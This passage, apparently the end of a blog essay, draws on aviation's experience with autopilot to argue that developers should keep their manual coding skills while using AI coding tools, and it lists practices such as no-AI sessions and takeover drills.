So how do you apply aviation's lessons? Here's what I've started doing:

1. Designate "no-AI" coding sessions. Once a week, I write code without any AI assistance. It's humbling. It's slower. It's also the only way I've found to keep my debugging instincts sharp.

2. Always read before accepting. Treat AI suggestions like a pull request from a junior developer who's very fast but doesn't understand your system's constraints. Review everything.

3. Use graduated automation deliberately.

No automation: Core business logic, security-critical paths
Light automation (completions): Boilerplate, test scaffolding, documentation
Heavy automation (generation): Prototypes, throwaway scripts, exploration

4. Practice "takeover drills." Take a piece of AI-generated code you're using in production and rewrite it from scratch. If you can't, that's a red flag — you're shipping code you don't understand.

5. Know your automation level. At any given moment, be conscious of how much you're relying on AI. Are you driving, or are you a passenger?

The Uncomfortable Truth

Aviation didn't solve the automation problem by rejecting autopilot. Planes are safer than ever, and autopilot is a huge part of that. They solved it by developing a rigorous framework for when to use automation, how much to use, and how to maintain manual skills alongside it.

We need the same thing for software engineering. AI coding tools aren't going away — nor should they. But if your response to every coding challenge is to describe it in a prompt and accept whatever comes back, you're becoming a Child of the Magenta.

The developers who thrive in the AI era won't be the ones who use AI the most, or the ones who refuse to use it at all. They'll be the ones who know exactly when to engage the autopilot and when to hand-fly.

And they'll practice both.